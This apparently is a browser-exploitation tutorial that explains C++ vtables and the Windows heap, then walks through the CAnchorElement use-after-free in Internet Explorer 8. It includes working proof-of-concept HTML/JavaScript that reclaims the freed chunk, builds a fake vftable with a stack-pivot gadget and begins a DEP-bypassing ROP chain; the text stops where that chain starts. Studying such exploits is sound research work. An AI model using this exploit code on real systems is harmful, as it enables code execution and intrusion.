In addition to the constructor and destructor, we can see that classOne prototypes two β€œvirtual functions”, with empty definitions. Per Microsoft’s documentation, a virtual function is β€œA member function that you expect to be redefined in a derived class”. If you are not innately familiar with C++, as I am not, you may be wondering what a member function is. A member function, simply put, is just a function that is defined in a class, as a member. Here is an example struct you would typically see in C:

struct mystruct{
  int var1;
  int var2;

As you know, the first member of this struct is int var1. The same bodes true with C++ classes. A function that is defined in a class is also a member, hence the term β€œmember function”.

The reason virtual functions exists, is it allows a developer to prototype a function in a main class, but allows for the developer to redefine the function in a derivative class. This works because the derivative class can inherit all of the variables, functions, etc. from its β€œparent” class. This can be seen in the above code snippet, placed here for brevity: classOne* c1 = new classTwo;. This takes a derivative class of classOne, which is classTwo, and points the classOne object (c1) to the derivative class. It ensures that whenever an object (e.g. c1) calls a function, it is the correctly defined function for that class. So basically think of it as a function that is declared in the main class, is inherited by a sub class, and each sub class that inherits it is allowed to change what the function does. Then, whenever a class object calls the virtual function, the corresponding function definition, appropriate to the class object invoking it, is called.

Running the program, we can see we acquire the expected result:

Now that we have armed ourselves with a basic understanding of some key concepts, mainly constructors, destructors, and virtual functions, let’s take a look at the assembly code of how a virtual function is fetched.

Note that it is not necessary to replicate these steps, as long as you are following along. However, if you would like to follow step-by-step, the name of this .exe is virtualfunctions.exe. This code was compiled with Visual Studio as an β€œEmpty C++ Project”. We are building the solution in Debug mode. Additionally, you’ll want to open up your code in Visual Studio. Make sure the program is set to x64, which can be done by selecting the drop down box next to Local Windows Debugger at the top of Visual Studio.

Before compiling, select Project > nameofyourproject Properties. From here, click C/C++ and click on All Options. For the Debug Information Format option, change the option to Program Database /Zi.

After you have completed this, follow these instructions from Microsoft on how to set the linker to generate all the debug information that is possible.

Now, build the solution and then fire up WinDbg. Open the .exe in WinDbg (note you are not attaching, but opening the binary) and execute the following command in the WinDbg command window: .symfix. This will automatically configure debugging symbols properly for you, allowing you to resolve function names not only in virtualfunctions.exe, but also in Windows DLLs. Then, execute the .reload command to refresh your symbols.

After you have done this, save the current workspace with File > Save Workspace. This will save your symbol resolution configuration.

For the purposes of this vulnerability, we are mostly interested the virtual function table. With that in mind, let’s set a breakpoint on the main function with the WinDbg command bp virtualfunctions!main. Since we have the source file at our disposal, WinDbg will automatically generate a View window with the actual C code, and will walk through the code as you step through it.

In WinDbg, step through the code with t to until we hit c1->sharedFunction().

After reaching the beginning of the virtual function call, let’s set breakpoints on the next three instructions after the instruction in RIP. To do this, leverage bp 00007ff7b67c1703, etc.

Stepping into the next instruction, we can see that the value pointed to by RAX is going to be moved into RAX. This value, according to WinDbg, is virtualfunctions!classTwo::vftable.

As we can see, this address is a pointer to the β€œvftable” (a virtual function table pointer, or vptr). A vftable is a virtual function table, and it essentially is a structure of pointers to different virtual functions. Recall earlier how we said β€œwhen a class calls a virtual function, the program will know which function corresponds to each class object”. This is that process in action. Let’s take a look at the current instruction, plus the next two.

You may not be able to tell it now, but this sort of routine (e.g. mov reg, [ptr] + call [ptr]) is indicative of a specific virtual function being fetched from the virtual function table. Let’s walk through now to see how this is working. Stepping through the call, the vptr (which is a pointer to the table), is loaded into RAX. Let’s take a look at this table now.

Although these symbols are a bit confusing, notice how we have two pointers here - one is ?sharedFunctionclassTwo and the other is ?sharedFunction1classTwo. These are actually pointers to the two virtual functions within classTwo!

If we step into the call, we can see this is a call that redirects to a jump to the sharedFunction virtual function defined in classTwo!

Next, keep stepping into instructions in the debugger, until we hit the c1->sharedFunction1() instruction. Notice as you are stepping, you will eventually see the same type of routine done with sharedFunction within classThree.

Again, we can see the same type of behavior, only this time the call instruction is call qword ptr [rax+0x8]. This is because of the way virtual functions are fetched from the table. The expertly crafted Microsoft Paint chart below outlines how the program indexes the table, when there are multiple virtual functions, like in our program.

As we recall from a few images ago, where we dumped the table and saw our two virtual function addresses. We can see that this time program execution is going to invoke this table at an offset of 0x8, which is a pointer to sharedFunction1 instead of sharedFunction this time!

Stepping through the instruction, we hit sharedFunction1.

After all of the virtual functions have executed, our destructor will be called. Since we only created two classOne objects, and we are only deleting those two objects, we know that only the classOne destructor will be called, which is evident by searching for the term β€œdestructor” in IDA. We can see that the j_operator_delete function will be called, which is just a long and drawn out jump thunk to the UCRTBASED Windows API function _free_dbg, to destroy the object. Note that this would normally be a call to the C Runtime function free, but since we built this program in debug mode, it defaults to the debug version.

Great! We now know how C++ classes index virtual function tables to retrieve virtual functions associated with a given class object. Why is this important? Recall this will be a browser exploit, and browsers are written in C++! These class objects, which almost certainly will use virtual functions, are allocated on the heap! This is very useful to us.

Before we move on to our exploitation path, let’s take just a few extra minutes to show what a use-after-free potentially looks like, programmatically. Let’s add the following snippet of code to the main function:

// Main function
int main()
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;


  delete c1;
  delete c1_2;

  // Creating a use-after-free situation. Accessing a member of the class object c1, after it has been freed

Rebuild the solution. After rebuilding, let’s set WinDbg to be our postmortem debugger. Open up a cmd.exe session, as an administrator, and change the current working directory to the installation of WinDbg. Then, enter windbg.exe -I.

This command configured WinDbg to automatically attach and analyze a program that has just crashed. The above addition of code should cause our program to crash.

Additionally, before moving on, we are going to turn on a feature of the Windows SDK known as gflags.exe. glfags.exe, when leveraging its PageHeap functionality, provides extremely verbose debugging information about the heap. To do this, in the same directory as WinDbg, enter the following command to enable PageHeap for our process gflags.exe /p /enable C:\Path\To\Your\virtualfunctions.exe. You can read more about PageHeap here and here. Essentially, since we are dealing with memory that is not valid, PageHeap will aid us in still making sense of things, by specifying β€œpatterns” on heap allocations. E.g. if a page is free, it may fill it with a pattern to let you know it is free, rather than just showing ??? in WinDbg, or just crashing.

Run the .exe again, after adding the code, and WinDbg should fire up.

After enabling PageHeap, let’s run the vulnerable code. (Note you may need to right click the below image and open it in a new tab)

Very interesting, we can see a crash has occurred! Notice the call qword ptr [rax] instruction we landed on, as well. First off, this is a result of PageHeap being enabled, meaning we can see exactly where the crash occurred, versus just seeing a standard access violation. Recall where you have seen this? This looks to be an attempted function call to a virtual function that does not exist! This is because the class object was allocated on the heap. Then, when delete is called to free the object and the destructor is invoked, it destroys the class object. That is what happened in this case - the class object we are trying to call a virtual function from has already been freed, so we are calling memory that isn’t valid.

What if we were able to allocate some heap memory in place of the object that was freed? Could we potentially control program execution? That is going to be our goal, and will hopefully result in us being able to get stack control and obtain a shell later. Lastly, let’s take a few moments to familiarize ourself with the Windows heap, before moving on to the exploitation path.

The Windows Heap Manager - The Low Fragmentation Heap (LFH), Back-End Allocator, and Default Heaps

tl;dr -The best explanation of the LFH, and just heap management in general on Windows, can be found at this link. Chris Valasek’s paper on the LFH is the de facto standard on understanding how the LFH works and how it coincides with the back-end manager, and much, if not all, of the information provided here, comes from there. Please note that the heap has gone through several minor and major changes since Windows 7, and it should be considered techniques leveraging the heap internals here may not be directly applicable to Windows 10, or even Windows 8.

It should be noted that heap allocations start out technically by querying the front-end manager, but since the LFH, which is the front-end manager on Windows, is not always enabled - the back-end manager ends up being what services requests at first.

A Windows heap is managed by a structure known as HeapBase, or ntdll!_HEAP. This structure contains many members to get/provide applicable information about the heap.

The ntdll!_HEAP structure contains a member called BlocksIndex. This member is of type _HEAP_LIST_LOOKUP, which is a linked-list structure. (You can get a list of active heaps with the !heap command, and pass the address as an argument to dt ntdll_HEAP). This structure is used to hold important information to manage free chunks, but does much more.

Next, here is what the HeapBase->BlocksIndex (_HEAP_LIST_LOOKUP)structure looks like.

The first member of this structure is a pointer to the next _HEAP_LIST_LOOKUP structure in line, if there is one. There is also an ArraySize member, which defines up to what size chunks this structure will track. On Windows 7, there are only two sizes supported, meaning this member is either 0x80, meaning the structure will track chunks up to 1024 bytes, or 0x800, which means the structure will track up to 16KB. This also means that for each heap, on Windows 7, there are technically only two of these structures - one to support the 0x80 ArraySize and one to support the 0x800 ArraySize.

HeapBase->BlocksIndex, which is of type _HEAP_LIST_LOOKUP, also contains a member called ListHints, which is a pointer into the FreeLists structure, which is a linked-list of pointers to free chunks available to service requests. The index into ListHints is actually based on the BaseIndex member, which builds off of the size provided by ArraySize. Take a look at the image below, which instruments another _HEAP_LIST_LOOKUP structure, based on the ExtendedLookup member of the first structure provided by ntdll!_HEAP.

For example, if ArraySize is set to 0x80, as is seen in the first structure, the BaseIndex member is 0, because it manages chunks 0x0 - 0x80 in size, which is the smallest size possible. Since this screenshot is from Windows 10, we aren’t limited to 0x80 and 0x800, and the next size is actually 0x400. Since this is the second smallest size, the BaseIndex member is increased to 0x80, as now chunks sizes 0x80 - 0x400 are being addressed. This BaseIndex value is then used, in conjunction with the target allocation size, to index ListHints to obtain a chunk for servicing an allocation. This is how ListHints, a linked-list, is indexed to find an appropriately sized free chunk for usage via the back-end manager.

What is interesting to us is that the BLINK (back link) of this structure, ListHints, when the front-end manager is not enabled, is actually a pointer to a counter. Since ListHints will be indexed based on a certain chunk size being requested, this counter is used to keep track of allocation requests to that certain size. If 18 consecutive allocations are made to the same chunk size, this enables the LFH.

To be brief about the LFH - the LFH is used to service requests that meet the above heuristics requirements, which is 18 consecutive allocations to the same size. Other than that, the back-end allocator is most likely going to be called to try to service requests. Triggering the LFH in some instances is useful, but for the purposes of our exploit, we will not need to trigger the LFH, as it will already be enabled for our heap. Once the LFH is enabled, it stays on by default. This is useful for us, as now we can just create objects to replace the freed memory. Why? The LFH is also LIFO on Windows 7, like the stack. The last deallocated chunk is the first allocated chunk in the next request. This will prove useful later on. Note that this is no longer the case on more updated systems, and the heap has a greater deal of randomization.

In any event, it is still worth talking about the LFH in its entierty, and especially the heap on Windows. The LFH essentially optimizes the way heap memory is distributed, to avoid breaking, or fragmenting memory into non-contiguous blocks, so that almost all requests for heap memory can be serviced. Note that the LFH can only address allocations up to 16KB. For now, this is what we need to know as to how heap allocations are serviced.

Now that we have talked about the different heap manager, let’s talk about usage on Windows.

Processes on Windows have at least one heap, known as the default process heap. For most applications, especially those smaller in size, this is more than enough to provide the applicable memory requirements for the process to function. By default it is 1 MB, but applications can extend their default heaps to bigger sizes. However, for more memory intensive applications, additional algorithms are in play, such as the front-end manager. The LFH is the front-end manager on Windows, starting with Windows 7.

In addition to the aforesaid heaps/heap managers, there is also a segment heap, which was added with Windows 10. This can be read about here.

Please note that this explanation of the heap can be more integrally explained by Chris’ paper, and the above explanations are not a comprehensive list, are targeted more towards Windows 7, and are listed simply for brevity and because they are applicable to this exploit.

The Vulnerability And Exploitation Strategy

Now that we have talked about C++ and heap behaviors on Windows, let’s dive into the vulnerability itself. The full exploit script is available on the Exploit-DB, by way of the Metasploit team, and if you are confused by the combination of Ruby and HTML/JavaScript, I have gone ahead and stripped down the code to β€œthe trigger code”, which causes a crash.

Going back over the vulnerability, and reading the description, this vulnerability arises when a CPhraseElement comes after a CTableRow element, with the final node being a sub-table element. This may seem confusing and illogical at first, and that is because it is. Don’t worry so much about the order of the code first, as to the actual root cause, which is that when a CPhraseElement’s outerText property is reset (freed). However, after this object has been freed, a reference still remains to it within the C++ code. This reference is then passed down to a function that will eventually try to fetch a virtual function for the object. However, as we saw previously, accessing a virtual function for a freed object will result in a crash - and this is what is happening here. Additionally, this vulnerability was published at HitCon 2013. You can view the slides here, which contains a similar proof of concept above. Note that although the elements described are not the same name as the elements in the HTML, note that when something like CPhraseElement is named, it refers to the C++ class that manages a certain object. So for now, just focus on the fact we have a JavaScript function that essentially creates an element, and then sets the outerText property to NULL, which essentially will perform a β€œfree”.

So, let’s get into the crash. Before starting, note that this is all being done on a Windows 7 x86 machine, Service Pack 0. Additionally, the browser we are focusing on here is Internet Explorer 8. In the event the Windows 7 x86 machine you are working on has Internet Explorer 11 installed, please make sure you uninstall it so browsing defaults to Internet Explorer 8. A simple Google search will aid you in removing IE11. Additionally, you will need WinDbg to debug. Please use the Windows SDK version 8 for this exploit, as we are on Windows 7. It can be found here.

After saving the code as an .html file, opening it in Internet Explorer reveals a crash, as is expected.

Now that we know our POC will crash the browser, let’s set WinDbg to be our postmortem debugger, identically how we did earlier, to identify if we can’t see why this crash ensued.

Running the POC again, we can see that our crash registered in WinDbg, but it seems to be nonsensical.

We know, according the advisory, this is a use-after-free condition. We also know it is the result of fetching a virtual function from an object that no longer exists. Knowing this, we should expect to see some memory being dereferenced that no longer exists. This doesn’t appear to be the case, however, and we just see a reference to invalid memory. Recall earlier when we turned on PageHeap! We need to do the same thing here, and enable PageHeap for Internet Explorer. Leverage the same command from earlier, but this time specify iexplore.exe.

After enabling PageHeap, let’s rerun the POC.

Interesting! The instruction we are crashing on is from the class CElement. Notice the instruction the crash occurs on is mov reg, dword ptr[eax+70h]. If we unsassembly the current instruction pointer, we can see something that is very reminiscent of our assembly instructions we showed earlier to fetch a virtual function.

Recall last time, on our 64-bit system, the process was to fetch the vptr, or pointer to the virtual function table, and then to call what this pointer points to, at a specific offset. Dereferencing the vptr, at an offset of 0x8, for instance, would take the virtual function table and then take the second entry (entry 1 is 0x0, entry 2 is 0x8, entry 3 would be 0x18, entry 4 would be 0x18, and so on) and call it.

However, this methodology can look different, depending on if you are on a 32-bit system or a 64-bit system, and compiler optimization can change this as well, but the overarching concept remains. Let’s now take a look at the above image.

What is happening here is the a fetching of the vptr via [ecx]. The vptr is loaded into ECX and then is dereferenced, storing the pointer into EAX. The EAX register, which now contains the pointer to the virtual function table, is then going to take the pointer, go 0x70 bytes in, and dereference the address, which would be one of the virtual functions (which ever function is stored at virtual_function_table + 0x70)! The virtual function is placed into EDX, and then EDX is called.

Notice how we are getting the same result as our simple program earlier, although the assembly instructions are just slightly different? Looking for these types of routines are very indicative of a virtual function being fetched!

Before moving on, let’s recall a former image.

Notice the state of EAX whenever the function crashes (right under the Access Violation statement). It seems to have a pattern of sorts f0f0f0f0. This is the gflags.exe pattern for β€œa freed allocation”, meaning the value in EAX is in a free state. This makes sense, as we are trying to index an object that simply no longer exists!

Rerun the POC, and when the crash occurs let’s execute the following !heap command: !heap -p -a ecx.

Why ECX? As we know, the first thing the routine for fetching a virtual function does is load the vptr into EAX, from ECX. Since this is a pointer to the table, which was allocated by the heap, this is technically a pointer to the heap chunk. Even though the memory is in a free state, it is still pointed to by the value [ecx] in this case, which is the vptr. It is only until we dereference the memory can we see this chunk is actually invalid.

Moving on, take a look at the call stack we can see the function calls that led up to the chunk being freed. In the !heap command, -p is to use a PageHeap option, and -a is to dump the entire chunk. On Windows, when you invoke something such as a C Runtime function like free, it will eventually hand off execution to a Windows API. Knowing this, we know that the β€œlowest level” (e.g. last) function call within a module to anything that resembles the word β€œfree” or β€œdestructor” is responsible for the freeing. For instance, if we have an .exe named vuln.exe, and vuln.exe calls free from the MSVCRT library (the Microsoft C Runtime library), it will actually eventually hand off execution to KERNELBASE!HeapFree, or kernel32!HeapFree, depending on what system you are on. The goal now is to identify such behavior, and to determine what class actually is handling the free that is responsible for freeing the object (note this doesn’t necessarily mean this is the β€œvulnerable piece of code”, it just means this is where the free occurs).

Note that when analyzing call stacks in WinDbg, which is simply a list of function calls that have resulted to where execution currently resides, the bottom function is where the start is, and the top is where execution currently is/ended up. Analyzing the call stack, we can see that the last call before kernel32 or ntdll is hit, is from the mshtml library, and from the CAnchorElement class. From this class, we can see the destructor is what kicks off the freeing. This is why the vulnerability contains the words CAnchorElement Use-After-Free!

Awesome, we know what is causing the object to be freed! Per our earlier conversation surrounding our overarching exploitation strategy, we could like to try and fill the invalid memory with some memory we control! However, we also talked about the heap on Windows, and how different structures are responsible for determining which heap chunk is used to service an allocation. This heavily depends on the size of the allocation.

In order for us to try and fill up the freed chunk with our own data, we first need to determine what the size of the object being freed is, that way when we allocate our memory, it will hopefully be used to fill the freed memory slot, since we are giving the browser an allocation request of the exact same size as a chunk that is currently freed (recall how the heap tries to leverage existing freed chunks on the back-end before invoking the front-end).

Let’s step into IDA for a moment to try to reverse engineer exactly how big this chunk is, so that way we can fill this freed chunk with out own data.

We know that the freeing mechanism is the destructor for the CAnchorElement class. Let’s search for that in IDA. To do this, download IDA Freeware for Windows on a second Windows machine that is 64-bit, and preferably Windows 10. Then, take mshtml.dll, which is found in C:\Windows\system32 on the Windows 7 exploit development machine, copy it over to the Windows machine with IDA on it, and load it. Note that there may be issues with getting the proper symbols in IDA, since this is an older DLL from Windows 7. If that is the case, I suggest looking at PDB Downloader to quickly obtain the symbols locally, and import the .pdb files manually.

Now, let’s search for the destructor. We can simply search for the class CAnchorElement and look for any functions that contain the word destructor.

As we can see, we found the destructor! According to the previous stack trace, this destructor should make a call to HeapFree, which actually does the freeing. We can see that this is the case after disassembling the function in IDA.

Querying the Microsoft documentation for HeapFree, we can see it takes three arguments: 1. A handle to the heap where the chunk of memory will be freed, 2. Flags for freeing, and 3. A pointer to the actual chunk of memory to be freed.

At this point you may be wondering, β€œnone of those parameters are the size”. That is correct! However, we now see that the address of the chunk that is going to be freed will be the third parameter passed to the HeapFree call. Note that since we are on a 32-bit system, functions arguments will be passed through the __stdcall calling convention, meaning the stack is used to pass the arguments to a function call.

Take one more look at the prototype of the previous image. Notice the destructor accepts an argument for an object of type CAnchorElement. This makes sense, as this is the destructor for an object instantiated from the CAnchorElement class. This also means, however, there must be a constructor that is capable of creating said object as well! And as the destructor invokes HeapFree, the constructor will most likely either invoke malloc or HeapAlloc! We know that the last argument for the HeapFree call in the destructor is the address of the actual chunk to be freed. This means that a chunk needs to be allocated in the first place. Searching again through the functions in IDA, there is a function located within the CAnchorElement class called CreateElement, which is very indicative of a CAnchorElement object constructor! Let’s take a look at this in IDA.

Great, we see that there is in fact a call to HeapAlloc. Let’s refer to the Microsoft documentation for this function.

The first parameter is again, a handle to an existing heap. The second, are any flags you would like to set on the heap allocation. The third, and most importantly for us, is the actual size of the heap. This tells us that when a CAnchorElement object is created, it will be 0x68 bytes in size. If we open up our POC again in Internet Explorer, letting the postmortem debugger taking over again, we can actually see the size of the free from the vulnerability is for a heap chunk that is 0x68 bytes in size, just as our reverse engineering of the CAnchorElement::CreateElement function showed!


This proves our hypothesis, and now we can start editing our script to see if we can’t control this allocation. Before proceeding, let’s disable PageHeap for IE8 now.

Now with that done, let’s update our POC with the following code.

The above POC starts out again with the trigger, to create the use-after-free condition. After the use-after-free is triggered, we are creating a string that has 104 bytes, which is 0x68 bytes - the size of the freed allocation. This by itself doesn’t result in any memory being allocated on the heap. However, as Corelan points out, it is possible to create an arbitrary DOM element and set one of the properties to the string. This action will actually result in the size of the string, when set to a property of a DOM element, being allocated on the heap!

Let’s run the new POC and see what result we get, leveraging WinDbg once again as a postmortem debugger.

Interesting! This time we are attempting to dereference the address 0x41414141, instead of getting an arbitrary crash like we did at the beginning of this blog, by triggering the original POC without PageHeap enabled! The reason for this crash, however, is much different! Recall that the heap chunk causing the issue is in ECX, just like we have previously seen. However, this time, instead of seeing freed memory, we can actually see our user-controlled data now allocates the heap chunk!

Now that we have finally figured out how we can control the data in the previously freed chunk, we can bring everything in this tutorial full circle. Let’s look at the current program execution.

We know that this is a routine to fetch a virtual function from a virtual function table. The first instruction, mov eax, dword ptr [ecx] takes the virtual function table pointer, also known as the vptr, and loads it into the EAX register. Then, from there, this vptr is dereferenced again, which points to the virtual function table, and is called at a specified offset. Notice how currently we control the ECX register, which is used to hold the vptr.

Let’s also take a look at this chunk in context of a HeapBase structure.

As we can see, in the heap our chunk is a part of, the LFH is activated (FrontEndHeapType of 0x2 means the LFH is in use). As mentioned earlier, this will allow us to easily fill in the freed memory with our own data, as we have just seen in the images above. Remember that the LFH is also LIFO, like the stack, on Windows 7. The last deallocated chunk is the first allocated chunk in the next request. This has proven useful, as we were able to find out the correct size for this allocation and service it.

This means that we own the 4 bytes that was previously used to hold the vptr. Let’s think now - what if it were possible to construct our own fake virtual function table, with 0x70 entries? What we could do is, with our primitive to control the vptr, we could replace the vptr with a pointer to our own β€œvirtual function table”, which we could allocate somewhere in memory. From there, we could create 70 pointers (think of this as 70 β€œfake functions”) and then have the vptr we control point to the virtual function table.

By program design, the program execution would naturally dereference our fake virtual function table, it would fetch whatever is at our fake virtual function table at an offset of 0x70, and it would invoke it! The goal from here is to construct our own vftable and to make the 70th β€œfunction” in our table a pointer to a ROP chain that we have constructed in memory, which will then bypass DEP and give us a shell!

We know now that we can fill our freed allocation with our own data. Instead of just using DOM elements, we will actually be using a technique to perform precise reallocation with HTML+TIME, as described by Exodus Intelligence. I opted for this method to just simply avoid heap spraying, which is not the focus of this post. The focus here is to understand use-after-free vulnerabilities and understand JavaScript’s behavior. Note that on more modern systems, where a primitive such as this doesn’t exist anymore, this is what makes use-after-frees more difficult to exploit, the reallocation and reclaiming of freed memory. It may require additional reverse engineering to find objects that are a suitable size, etc.

Essentially what this HTML+TIME β€œmethod”, which only works for IE8, does is instead of just placing 0x68 bytes of memory to fill up our heap, which still results in a crash because we are not supplying pointers to anything, just raw data, we can actually create an array of 0x68 pointers that we control. This way, we can force the program execution to actually call something meaningful (like our fake virtual table!).

Take a look at our updated POC. (You may need to open the first image in a new tab)

Again, the Exodus blog will go into detail, but what essentially is happening here is we are able to leverage SMIL (Synchronized Multimedia Integration Language) to, instead of just creating 0x68 bytes of data to fill the heap, create 0x68 bytes worth of pointers, which is much more useful and will allow us to construct a fake virtual function table.

Note that heap spraying is something that is an alternative, although it is relatively scrutinized. The point of this exploit is to document use-after-free vulnerabilities and how to determine the size of a freed allocation and how to properly fill it. This specific technique is not applicable today, as well. However, this is the beginning of myself learning browser exploitation, and I would expect myself to start with the basics.

Let’s now run the POC again and see what happens.

Great news, we control the instruction pointer! Let’s examine how we got here. Recall that we are executing code within the same routine in CElement::Doc we have been, where we are fetching a virtual function from a vftable. Take a look at the image below.

Let’s start with the top. As we can see, EIP is now set to our user-controlled data. The value in ECX, as has been true throughout this routine, contains the address of the heap chunk that has been the culprit of the vulnerability. We have now controlled this freed chunk with our user-supplied 0x68 byte chunk.

As we know, this heap chunk in ECX, when dereferenced, contains the vptr, or in our case, the fake vptr. Notice how the first value in ECX, and every value after, is 004.... These are the array of pointers the HTML+TIME method returned! If we dereference the first member, it is a pointer to our fake vftable! This is great, as the value in ECX is dereferenced to fetch our fake vptr (one of the pointers from the HTML+TIME method). This then points to our fake virtual function table, and we have set the 70th member to 42424242 to prove control over the instruction pointer. Just to reiterate one more time, remember, the assembly for fetching a virtual function is as follows:

mov eax, dword ptr [ecx]   ; This gets the vptr into EAX, from the value pointed to by ECX
mov edx, dword ptr [eax+0x70]  ; This takes the vptr, dereferences it to obtain a pointer to the virtual function table at an offset of 0x70, and stores it in EDX
call edx       ; The function is called

So what happened here is that we loaded our heap chunk, that replaced the freed chunk, into ECX. The value in ECX points to our heap chunk. Our heap chunk is 0x68 bytes and consists of nothing but pointers to either the fake virtual function table (the 1st pointer) or a pointer to the string vftable(the 2nd pointer and so on). This can be seen in the image below (In WinDbg poi() will dereference what is within parentheses and display it).

This value in ECX, which is a pointer to our fake vtable, is also placed in EAX.

The value in EAX, at an offset of 0x70 is then placed into the EDX register. This value is then called.

As we can see, this is 42424242, which is the target function from our fake vftable! We have now successfully created our exploit primitive, and we can begin with a ROP chain, where we can exchange the EAX and ESP registers, since we control EAX, to obtain stack control and create a ROP chain.

I Mean, Come On, Did You Expect Me To Skip A Chance To Write My Own ROP Chain?

First off, before we start, it is well known IE8 contains some modules that do not depend on ASLR. For these purposes, this exploit will not take into consideration ASLR, but I hope that true ASLR bypasses through information leaks are something that I can take advantage of in the future, and I would love to document those findings in a blog post. However, for now, we must learn to walk before we can run. At the current state, I am just learning about browser exploitation, and I am not there yet. However, I hope to be soon!

It is a well known fact that, while leveraging the Java Runtime Environment, version 1.6 to be specific, an older version of MSVCR71.dll gets loaded into Internet Explorer 8, which is not compiled with ASLR. We could just leverage this DLL for our purposes. However, since there is already much documentation on this, we will go ahead and just disable ASLR system wide and constructing our own ROP chain, to bypass DEP, with another library that doesn’t have an β€œautomated ROP chain”. Note again, this is the first post in a series where I hope to increasingly make things more modern. However, I am in my infancy in regards to learning browser exploitation, so we are going to start off by walking instead of running. This article describes how you can disable ASLR system wide.

Great. From here, we can leverage the rp++ utility to enumerate ROP gadgets for a given DLL. Let’s search in mshtml.dll, as we are already familiar with it!

To start, we know that our fake virtual function table is in EAX. We are not limited to a certain size here, as this table is pointed to by the first of 26 DWORDS (for a total of 0x68, or 104 bytes) that fills up the freed heap chunk. Because of this, we can exchange the EAX register (which we control) with the ESP register. This will give us stack control and allow us to start forging a ROP chain.

Parsing the ROP gadget output from rp++, we can see a nice ROP gadget exists

Let’s set update our POC with this ROP gadget, in place of the former 42424242 DWORD that is in place of our fake virtual function.

<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>

    window.onload = function() {

      // Create the fake vftable of 70 DWORDS (70 "functions")
      vftable = "\u4141\u4141";

      for (i=0; i < 0x70/4; i++)
        // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
        // which is now controlled by our own chunk
        if (i == 0x70/4-1)
          vftable+= unescape("\ua1ea\u74c7");     // ο»Ώxchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
          vftable+= unescape("\u4141\u4141");

      // This creates an array of strings that get pointers created to them by the values property of t:ANIMATECOLOR (so technically these will become an array of pointers to strings)
      // Just make sure that the strings are semicolon separated (the first element, which is our fake vftable, doesn't need to be prepended with a semicolon)
      // The first pointer in this array of pointers is a pointer to the fake vftable, constructed with the above for loops. Each ";vftable" string is prepended to the longer 0x70 byte fake vftable, which is the first pointer/DWORD
      for(i=0; i<25; i++)
        vftable += ";vftable";

      // Trigger the UAF
      var x  = document.getElementById("a");
      x.outerText = "";

      // Create a string that will eventually have 104 non-unicode bytes
      var fillAlloc = "\u4141\u4141";

      // Strings in JavaScript are in unicode
      // \u unescapes characters to make them non-unicode
      // Each string is also appended with a NULL byte
      // We already have 4 bytes from the fillAlloc definition. Appending 100 more bytes, 1 DWORD (4 bytes) at a time, compensating for the last NULL byte
      for (i=0; i < 100/4-1; i++)
        fillAlloc += "\u4242\u4242";

      // Create an array and add it as an element
      // https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
      // DOM elements can be created with a property set to the payload
      var newElement = document.createElement('img');
      newElement.title = fillAlloc;

      try {
        a = document.getElementById('anim');
        a.values = vftable;
      catch (e) {};

            <q id='a'>

Let’s (for now) leave WinDbg configured as our postmortem debugger, and see what happens. Running the POC, we can see that the crash ensues, and the instruction pointer is pointing to 41414141.

Great! We can see that we have gained control over EAX by making our virtual function point to a ROP gadget that exchanges EAX into ESP! Recall earlier what was said about our fake vftable. Right now, this table is only 0x70 bytes in size, because we know our vftable from earlier indexed a function from offset 0x70. This doesn’t mean, however, we are limited to 0x70 total bytes. The only limitation we have is how much memory we can allocate to fill the chunk. Remember, this vftable is pointed to by a DWORD, created from the HTML+TIME method to allocate 26 total DWORDS, for a total of 0x68 bytes, or 104 bytes in decimal, which is what we need in order to control the freed allocation.

Knowing this, let’s add some β€œROP” gadgets into our POC to outline this concept.

// Create the fake vftable of 70 DWORDS (70 "functions")
vftable = "\u4141\u4141";

for (i=0; i < 0x70/4; i++)
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
  vftable+= unescape("\ua1ea\u74c7");     // ο»Ώxchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
  vftable+= unescape("\u4141\u4141");

// Begin the ROP chain
rop = "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

Great! We can see that our crash still occurs properly, the instruction pointer is controlled, and we have added to our fake vftable, which is now located on the stack! In terms of exploitation strategy, notice there still remains a pointer on the stack that is our original xchg eax, esp instruction. Because of this, we will need to actually start our ROP chain after this pointer, since it already has been executed. This means that our ROP gadget should start where the 43434343 bytes begin, and the 41414141 bytes can remain as padding/a jump further into the fake vftable.

It should be noted that from here on out, I had issues with setting breakpoints in WinDbg with Internet Explorer processes. This is because Internet Explorer forks many processes, depending on how many tabs you have, and our code, even when opened in the original Internet Explorer tab, will fork another Internet Explorer process. Because of this, we will just continue to use WinDbg as our postmortem debugger for the time being, and making changes to our ROP chain, then viewing the state of the debugger to see our results. When necessary, we will start debugging the parent process of Internet Explorer and then WinDbg to identify the correct child process and then debug it in order to properly analyze our exploit.

We know that we need to change the rest of our fake vftable DWORDS with something that will eventually β€œjump” over our previously used xchg eax, esp ; ret gadget. To do this, let’s edit how we are constructing our fake vftable.

// Create the fake vftable of 70 DWORDS (70 "functions")
// Start the table with ROP gadget that increases ESP (Since this fake vftable is now on the stack, we need to jump over the first 70 "functions" to hit our ROP chain)
// Otherwise, the old xchg eax, esp ; ret stack pivot gadget will get re-executed
vftable = "\u07be\u74fb";                   // add esp, 0xC ; ret (74fb07be) (mshtml.dll)

for (i=0; i < 0x70/4; i++)
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
else if (i == 0x68/4-1)
  vftable += unescape("\u07be\u74fb");    // add esp, 0xC ; ret (74fb07be) (mshtml.dll) When execution reaches here, jump over the xchg eax, esp ; ret gadget and into the full ROP chain
  vftable+= unescape("\u7738\u7503");     // ret (75037738) (mshtml.dll) Keep perform returns to increment the stack, until the final add esp, 0xC ; ret is hit

// ROP chain
